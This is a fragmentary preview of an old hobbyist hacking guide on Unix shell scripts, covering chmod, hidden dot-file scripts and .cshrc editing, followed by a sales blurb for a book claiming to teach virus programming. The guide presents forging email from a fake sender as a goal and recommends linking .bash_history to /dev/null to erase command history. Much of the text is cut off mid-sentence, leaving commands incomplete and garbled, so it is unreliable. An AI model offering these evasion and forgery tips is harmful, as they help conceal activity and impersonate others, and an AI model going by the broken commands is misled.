There will be a line "editor = pico
...

********************************************************
Here's what your Pico screen should look like:
UW PICO(tm) 2
...

That "^" thingy means to hold down the control key while hitting the letter
of the alphabet that follows
...
Here are some fun ones:
echo I am a programmer and one heck of a hacker!
echo Today I am going to
echo $1 $2 $3 $4 $5 $6 $7 $8 $9
3) Now exit Pico
...
" Pico will
ask you if you want to save the file
...
It will ask
you whether you want to save it with the name "hackphile
...

4) Next make it executable
...
" On some computers the command "chmod +x hackphile"
will work
...
depending on the

path to whatever shell you are using) to make it work
...
Groan
...
Making a file executable
is only one of the many things that magical command does
...

Damian Bates of Rt66 Internet points out that you could set the permissions
so only you could execute that shell script by typing "chmod u+rx filename"
(u=you)
...
Any of these
can be done in combination such as "chmod ug+rx filename (user and group can
read and execute but not write) or "chmod g-rwx filename"
If you hate typing all that stuff, you can use numbers as in "chmod 700,"
which gives you, and only you read, write and execute permission
...
" To learn more on how to use the number chmod commands, use the command
"man chmod
...
" Press "enter" and
you will see on your screen: "I am a programmer and one heck of a hacker!
Today I am going to forge email from Santa Claus
...
Unlike more sophisticated
programming languages, you don't need to set up those dollar sign variables
in advance -- the stuff you type on the command line after the name of the
script automatically goes into those memory locations!
Now suppose you want a script to actually forge email from Santa Claus
...
You
can put in the command "telnet foobar
...

But if the next command in your shell script is "mail from:
santa@north
...
com," it just won't happen
...
You now are running a mail program on foobar
...

But help is on the way
...
More on these in later
Guides, I promise!
How about more fun ways to make shell scripts?
Shell Scripts on the Fly
In a rush? Do you always do things perfectly? If so, try the "cat" command
to create shell scripts
...
Type in:

cat > list
ls -alK|more
w|more
Then hold down the control key while hitting the letter "d
...
" Then make it executable with the command:
"chmod 700 list
...
)
Now, whenever you want to see everything you could ever want to see about
your files, followed by a list of info on whoever else is also logged into
shell accounts at the Unix box you use, just type in the command "list
...

17920 Dec 26 17:56
...
addressbook
2285 Aug 27 08:07
...
lu
9 Oct 27 15:35
...
cshrc

(snip)
3:01pm up 5 days, 6:48, 9 users, load average: 1
...
30, 1
...
fubar
...
com
kjherman t typ8 1:16pm 1:43
/bin/csh /usr/local/bin/cmenu
momshop ttyp9 2:50pm 10
/usr/local/bin/pine
swit ttypa 9:56am 4:20 41
-csh
joy ttypc 3:00pm
2 1 -csh

***************************************************
Newbie note: What does all that stuff mean? Sorry, this is an advanced
GTMHH, so all I'm going to tell you is to give the commands "man ls" and
"man who" to find out all this stuff
...
The "|" means "pipe
...
So "w|more" tells your computer to d o the command "w" and
pipe its output to the command "more
...

What does "lrwxrwxrwx 1 cpm
9 Oct 27 15:35
...
The first set of rwx's mean
I (the owner of the account) may read, write, and execute this file
...
The last set

means anyone in the world may read, write and execute this file
...

***************************************************
***************************************************
Evil genius tip: In case you saw that supposed bash history file of mine
some haxors were making phun of on some email lists, here's two ways you can
tell it was faked and they were seriously deficient in Unix knowledge
...
bash_history has been linked to dev/null (dev/null means "device null"
which is a fancy way of saying everything goes to bit heaven never to be
seen again) since Oct
...
Simply give the
command "ln -s /dev/null ~/
...
"
b) If you have the bash shell, and haven't linked it yet to dev/null, get
into it and use the "talk" command to chat with someone for awhile
...
bash_history
...
bash_history file
...

The guys who got caught by this trick tried to get out of their embarrassing
spot by claiming that a buffer overflow could make the contents of a talk
session turn up in a bash history file
...

***************************************************
Slightly Stealthy Scripts
Now suppose you are worried about really clueless kode kiddies getting into
your shell account
...
For example, at Def Con V a friend,
Daniel, conducted an informal poll
...
He found that over half the people there had never
even heard of it! Well, *you* know at least one way to use "cat" now!
Another example of haxor Unix cluelessness was a fellow who broke into my
shell account and planted a Trojan named "ls
...
But he forgot to give the command "chmod 700 ls
...

******************************************************
Evil genius tip: Damian advises "NEVER put '
...
" in your path, make
sure it is the last one
...
Set your umask (umask is the
command that automatically set permissions on all files you create, unless
you specify otherwise) to something more secure than 022, I personally use
077
...
"
For your reading enjoyment, use the commands "man chmod" and "man umask" to
get all the gory details
...

First, when you name your script, put a period in front of the name
...
secretscript"
...
Some kode kiddies don't know how to look for hidden files with the
command "ls -a
...
Just leave
it alone
...
It will execute even though you never gave that chmod 700 command!
What you have done with the "sh" command is launch a temporary new Unix
shell, and then send into that shell the commands of your script
...
Make this script:
cat >
...
Now try the command: "
...
lookeehere!: Permission denied
That's what will stump the average kode kiddie, presuming he can even find
that script in the first place
...
lookeehere!" All of a sudden you get screen after
screen of really interesting stuff!
Your Internet Service provider may have disabled some of the commands of
this Guide
...
For example, if the "netstat" command
doesn't work, give the command "whereis netstat
...
"
If, for example, you were to find it in /usr/bin, you can make that command
work with "/usr/bin/netstat" in your script
...
Either get a better shell account, or talk
your sysadmin into changing permissions on that file so you can execute it
...
Neat trick: take your sysadmin to a fancy
restaurant and wait to ask him for access to EVERY Unix command until after
you have paid for his meal
...
Says Damian, "I tend

to keep my own binaries in ~/bin/ (My home directory slash bin) and put that
in my path
...
"
Where can you get your own? Try http://sunsite
...
edu/pub/Linux/welcome
...
Yes, a
shell script can take a complex task such as impressing the heck out of your
friends, and make it possible for you to do by giving just one command per
cool stunt
...
And in fact you really will, honestly, be in control of
the most special, wonderful operating system on the planet
...
login in Pico
...
Want to edit it? You could totally screw up
your account by changing
...
But you are a hacker, so you aren't afraid,
right? Besides, if you mess up your shell account, you will force yourself
to either learn Unix real fast so you can fix it again, or else make friends
with tech support at your ISP as your try to explain why you accidentally
mapped the letter "e" to mean "erase
...
Hey, no one's
perfect!)
For example, do you have to put up with some babysitter menu every time you
log in? Do you see something that looks like "/usr/local/bin/menu" in

...
Then if you decide you
are sorry you turned it off, just remove the "#" and that command will work
again
...
e
...
cshrc
...
trash;chmod 700
...
cshrc
...
cshrc
...
cshrc after creating your
'
...
trash'
"When you next source the
...
trash directory in case you need it later
...
If it doesn't, fix it or 'cp ~/
...
cshrc ~'
...
It's always best to keep one session untarnished, just
in case
...
cshrc;rehash;' in your first window to take advantage of the changes made
...
That's what being a hacker is all
about, right? And thanks to Damian Bates, great fan of the Bastard Operator
from Hell, for reviewing and contributing to this Guide
...
mysite
...
Parental discretion advised:)

"There is no way you're describing our system,
she could never have gotten past our security
...

she broke the law, and she's going to pay!"
President of "Blah Blah Bank"
-->>> Does anybody ELSE see a small discrepancy here ???????



---

Title: The Beginner’s Guide To Hacking Computers Systems
Description: A wonderful book for beginners will teach you all about infiltration starting from the basics right up to advanced stages. This book extends the means used in the hack using both and windows and Linux and show you how to program viruses of various kinds.

Buy These NotesPreview